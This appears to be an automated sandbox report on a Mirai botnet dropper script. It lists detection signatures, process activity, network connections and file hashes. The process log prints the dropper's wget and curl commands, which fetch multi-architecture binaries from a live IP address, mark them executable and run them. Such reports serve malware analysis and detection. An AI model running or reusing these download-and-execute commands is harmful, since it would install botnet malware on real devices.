Analysis Overview
SHA256
09ae6fb139fb48daf4a6fb4c6754a040367836054ed902f19211806696470cc9
Threat Level: Known bad
The file 8UsA.sh was found to be: Known bad.
Malicious Activity Summary
Mirai
Executes dropped EXE
Modifies Watchdog functionality
Changes its process name
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-27 17:59
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-27 17:59
Reported
2024-04-27 18:02
Platform
ubuntu1804-amd64-20240226-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/watchdog | /tmp/3AvA | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/3AvA | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Josho.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.arm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3AvA | /tmp/8UsA.sh | N/A |
| File opened for modification | /tmp/Josho.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Josho.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Josho.arm5 | /usr/bin/curl | N/A |
Processes
/tmp/8UsA.sh
[/tmp/8UsA.sh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.x86]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.x86]
/bin/cat
[cat Josho.x86]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.mips]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.mips]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.mpsl]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.mpsl]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.arm4]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.arm4]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.arm5]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.arm5]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.arm6]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.arm6]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.arm7]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.arm7]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.ppc]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.ppc]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.m68k]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.m68k]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
/usr/bin/wget
[wget http://209.14.69.249/AB4g5/Josho.sh4]
/usr/bin/curl
[curl -O http://209.14.69.249/AB4g5/Josho.sh4]
/bin/chmod
[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.sh4 Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]
/tmp/3AvA
[./3AvA ssh]
Network
| Country | Destination | Domain | Proto |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.130.49:443 | tcp | |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 151.101.194.49:443 | cdn.fwupd.org | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 89.187.167.5:443 | tcp | |
| BR | 209.14.69.249:666 | tcp | |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | tcp | |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | tcp | |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | tcp | |
| BR | 209.14.69.249:666 | tcp | |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | tcp | |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | tcp | |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | tcp | |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | tcp | |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | tcp | |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:80 | 209.14.69.249 | tcp |
| BR | 209.14.69.249:666 | tcp |
Files
/tmp/Josho.x86
| MD5 | a648e3916f191a59f47d07a49702d0eb |
| SHA1 | 1d9280fd392858f5dbe61aea4cfa2453ade97442 |
| SHA256 | 0a82c84b8564ae5a178e3e8f6fc4550885055043928ee667e59efb035f9ccfc3 |
| SHA512 | 73ef7ce042d0d165c327acd50e984a08b3d8450fb8821c8ef390a8dc02044128836ba7590bd035a072a9b7a4c94defed1256e85b03887788fa998e5648b5e587 |